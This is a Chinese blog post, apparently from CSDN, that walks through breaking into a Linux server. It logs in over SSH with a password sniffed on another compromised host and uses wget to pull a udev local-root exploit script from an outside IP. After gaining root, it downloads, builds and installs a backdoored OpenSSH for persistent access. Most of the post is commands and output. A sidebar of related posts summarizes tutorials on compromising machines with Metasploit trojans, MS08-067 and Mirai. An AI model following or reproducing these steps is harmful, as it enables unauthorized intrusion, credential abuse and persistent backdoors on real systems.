linux抓肉鸡入侵详细教程,一台linux肉鸡的简单手工入侵检测过程

最新推荐文章于 2024-01-09 16:00:46 发布
最新推荐文章于 2024-01-09 16:00:46 发布
阅读量843 收藏
点赞数
文章标签: linux抓肉鸡入侵详细教程

今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。

[root@mail ~]# cat /tmp/sshpswd

ldc:sle823jfsGs@222.222.66.11

直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11

ldc@222.222.66.11's password:

Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200

[ldc@localhost ldc]$ cat /etc/issue

Red Hat Enterprise Linux Server release 5 (Tikanga)

Kernel \r on an \m

[ldc@localhost ldc]$ uname -a

Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核,vmsplice的local root应该可以的,不过测试了下,机器挂了,换udev的好了。

[ldc@localhost ldc]$ mkdir .v

[ldc@localhost ldc]$ cd .v

[ldc@localhost .v]$ wget http://211.100.50.70/u.sh

–13:21:09– http://211.100.50.70/u.sh

Connecting to 211.100.50.70:80… .. 200 OK

366 (3.3K) [application/x-sh]

Saving to: `u.sh’

100%[===========================================================================================>] 3,366       --.-K/s   in 0.04s

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls

r00t    r00t.c  u.sh

[ldc@localhost .v]$ chmod +x u.sh

[ldc@localhost .v]$ cat /proc/net/netlink

sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks

f69f8800 0   2486   00000111 0        0        00000000 2

f7fdae00 0   0      00000000 0        0        00000000 2

c2132200 6   0      00000000 0        0        00000000 2

f6a57a00 7   2143   00000001 0        0        00000000 2

f7caf000 7   0      00000000 0        0        00000000 2

f6a0be00 9   2143   00000000 0        0        00000000 2

f6a61200 9   1996   00000000 0        0        00000000 2

f7de1c00 9   0      00000000 0        0        00000000 2

f7d6ca00 10  0      00000000 0        0        00000000 2

f7fb3200 11  0      00000000 0        0        00000000 2

c2154200 15  476    ffffffff 0        0        00000000 2

f7fdac00 15  0      00000000 0        0        00000000 2

f7fb3000 16  0      00000000 0        0        00000000 2

c21cde00 18  0      00000000 0        0        00000000 2

[ldc@localhost .v]$ ps aux grep udev

root       477 0.0 0.0 2916 1396 ?        S

ldc       3462 0.0 0.0 4128 680 pts/0    S    13:00   0:00 grep udev

[ldc@localhost .v]$ sh u.sh 476

suid.c:

suid.c:3:

sh-3.1# w

13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]

sh-3.1# pwd

/home/ldc/.v

sh-3.1# ssh -V

OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

我们先留个ssh的后门。

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz

–13:32:08– http://211.100.50.70/openssh4.3p2.tar.gz

Connecting to 211.100.50.70:80… 200 OK

79990 (957K) [application/x-gzip]

Saving to: `openssh4.3p2.tar.gz’

100%

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz

sh-3.1# cd openssh-4.3p2/

sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh

checking for gcc... gcc

checking for C compiler default output file name... a.out

............(省略若干行)

sh-3.1# make && make install

conffile=`echo sshd_config.out sed 's/.out$//'`; \

/bin/sed -e 's/etc/ssh/ssh_prng_cmds/etc/ssh/ssh_prng_cmdsg' -e

............(省略若干行)

sh-3.1# cp ssh_config sshd_config /etc/ssh/

sh-3.1# /etc/rc.d/init.d/sshd restart

STOP sshd                                             [OK]

START sshd                                              [OK]

ok了,用我们的sshdoor登录。

[root@localhost ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

weixin_39727336
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一台linux肉鸡简单手工入侵检测过程.docx
01-15
一台linux肉鸡简单手工入侵检测过程.docx
kali linux肉鸡教程,简单扫4899端口捉肉鸡菜鸟教程详细
weixin_29513805的博客
05-02 3129
简单扫4899端口捉肉鸡 (菜鸟教程详细版)大家好。我是☆黑色毛衣☆。今天做的是简单扫4899端口捉肉鸡,只要把工具用好。找端口肉鸡不难可能有些扫135端口的扫描不了。这样就试试4899吧。因为扫135端口有些地方限制了。所以扫描不了。好了,话不多打。我们今次用到的工具有:1.S扫描器 (端口扫描器)2.4899过滤器 (过滤4899端口空密码主机专用)3.radmin (一个远程控制软件)4.免...
kali linux肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1459
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马,msfvenommsfve...
linux肉鸡教程视频,肉鸡教程和软件免费分享(2018一天1000只电脑肉鸡视频)...
weixin_32965503的博客
05-03 1524
大家应该都知道病毒吧!那么有没有想过利用病毒的传播特性来帮我们肉鸡呢?最近网上比较流行的就是U盘病毒。但是经常混迹于各大论坛的朋友应该都知道,网上也介绍了突破自动播放的方法,就是在U盘的根目录下新建一个Autorun.inf文件,内容如下:接下来的工作就是要编写一个程序,首先要让它有传播功能,而且还能够开启中毒电脑的端口以实现控制。我们来实现传播功能,就用VC来实现吧!该程序运行后,可以将自身副...
linux肉鸡教程视频,超简单的菜鸟网吧肉鸡教程
weixin_39731916的博客
05-03 2473
大家好!我是rockwolf,我这次给大家做的教程是超简单的菜鸟网吧肉鸡教程.首先,需要的工具:1.灰鸽子一个:版本任意2.WebMan:开启HTTP服务的小工具3.啊D网络工具包:这个大家应该很常用的了````不用介绍的了吧`````我的鸽子上线是在本机建立FTP服务器的,大家看我操作.首先,在本机任意目录建立一个做为FTP服务器的文件夹,我为了方便,就在F盘的根目录下建立了.打开灰鸽子,工具...
linux漏洞抓鸡,风靡全球的Ms08-067漏洞抓鸡大曝光
weixin_29356815的博客
05-16 582
三、利用Ms08-067工具进行溢出攻击当漏洞主机确定后,我们需要从网上下载Ms08-067远程溢出漏洞工具(下载地址:Http://www.youxia.org/upload/2008/10/Ms08-067.rar),然后将其压缩包解压到C盘根目录下。在依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“CMD”命令回车,将CMD命令提示窗口打开。而后跳转到C盘根目录下,并且进入到...
YOLO养殖场肉鸡目标检测检测数据集
11-12
几千张YOLO养殖场肉鸡目标检测检测数据集,检测鸡的位置,yolov5、yolov7、yolov8等算法可以直接进行训练模型, 数据集和检测结果参考:https://blog.csdn.net/zhiqingAI/article/details/124230743
YOLOv3养殖场肉鸡健康状态检测权重+数据集
05-25
YOLOv3养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
记一次入侵Linux服务器和删除木马程序的经历
01-10
晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包。 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有...
YOLOv10养殖场肉鸡健康状态检测权重+数据集
最新发布
06-29
YOLOv10养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
linux扫描弱口令上线发包的教程
04-26
1)用户方面清除一些不必要的系统用户,可以减少黑客攻击我们linux的入口;锁定账号适用于员工在一段时间不适用账号的场景(usermod -L);而锁定/etc下的passwd和shadow文件可以避免非法用户建立用户(chattr +i) 2)密码方面,设置密码有效期可以做到提醒用户定期更改密码,避免长期使用同一密码导致密码被破解的情况(vim /etc/login.defs和chage -M);设置员工首次登陆更改密码其实是为了员工在登陆账号后更改属于自己的密码(chage -d 0) 3)众所周知,默认的命令历史会显示之前敲过的1000条命令,假如linux被非法用户使用,通过history查看命令历史是一件很危险的事。所以,我们可以将命令历史的行数改的比较短,或者注销后直接清空来保证安全(export HISTSIZE=和vim ~/.bash_logout)。 4)自动注销(export TMOUT),即用户长时间不登陆自动返回登陆界面
1521批量服务器教程
12-16
1521批量服务器教程
Cobalt Strike后渗透神器入门
2301_77147676的博客
03-27 290
你需要掌握的三大神器,metasploit、empire、cobalt strike。在前面的实验中,我们分别介绍了(漏洞利用)和empire(后门控制)。今天的主题是个,或许你早在上就看到过这个黄毛小子,kali自带的metasploit图形版软件:armitage。cobalt strike是armitage的升级版,跟着本篇文章,一起来捉个鸡啦,静享丝滑~作者:ailx10链接:https://zhuanlan.zhihu.com/p/261147503来源:知乎著作权归作者所有。
Botnet:Kali下Mirai的编译使用及
无名J0kзr的博客
04-03 3056
文章目录杂主要参考1. 编译1.1 安装依赖1.2 克隆源码1.3 编译加密程序1.4 加密主控服务器域名和报告服务器域名1.4 修改病毒本体源码1.5 配置CNC控制中心1.5.1 编辑sql脚本1.5.2 创建用户mirai1.5.3 修改主程序1.6 交叉编译1.7 添加环境变量1.8 构建受控端和主控端程序1.9 构建Loader 杂 是为了做NIDS啦,网上都找不到Mirai公开的数据集...
肉鸡的几种方法
m0_62207482的博客
01-09 876
尤其是下 XXX 片 的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是 所有文件都可以这样的,我只知道 RM 和 EXE 文件可以插入),别人下载打开后同时也会带 开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马 了。(详细动画可以去黑客网站搜索 445)缺点也很明显,如果别人不是用 new 账号登入 XP 的,你再登入上去就会把他挤出 去(XP 只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开 IE 下载木马了。
002-windowa基础(DOS命令:net user 用户 密码 /add)
fiveseven的博客
08-21 3888
002-windowa基础(DOS命令:net user 用户 密码 /add)
什么是DDoS攻击?
yourgeek的博客
02-27 353
本文转载自知道创宇云安全的知乎回答:DDoS 的肉鸡都是哪来的? 说到DDoS攻击,我们就不得不说“肉鸡”。 “肉鸡”可谓是DDoS攻击的核心大杀器,作为一个要发起DDoS攻击的黑客来说,没有肉鸡就是没有枪,裸奔不好使的。 放眼肉鸡江湖,来源各异,品种丰富。攻击者没点套路怎么当“鸡主”?况且搞个鸡,那都是小菜一碟。 肉鸡哪儿来? 养鸡、买鸡、抓鸡那都是司空见惯的,做为一个资深的搞鸡专业户,社会这...
kali linux肉鸡教程
10-27
Kali Linux肉鸡教程是一种网络安全攻击技术,旨在通过社会工程学攻击和漏洞利用技术获取远程计算机的控制权。以下是一些步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用漏洞或社会工程学攻击技术,将木马程序安装到目标计算机上。 3. 在Kali Linux中使用msfconsole工具,设置监听器,等待目标计算机连接。 4. 一旦目标计算机连接到监听器,攻击者就可以获得对该计算机的控制权,并执行各种操作,例如窃取敏感信息、安装其他恶意软件等。 具体来说,以下是一些可能的步骤: 1. 扫描目标网络,找到易受攻击的计算机。 2. 利用社会工程学攻击技术,向目标计算机发送诱骗邮件或信息,诱导用户点击恶意链接或下载恶意文件。 3. 一旦用户点击链接或下载文件,木马程序就会被安装到目标计算机上。 4. 在Kali Linux中,使用msfvenom工具生成木马程序,并将其命名为evilshell.exe。 5. 将生成的木马文件拷贝到/var/www/html目录下,并开启apache服务。 6. 在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。 7. 一旦用户运行木马程序,攻击者就可以获得对该计算机的控制权,并执行各种操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值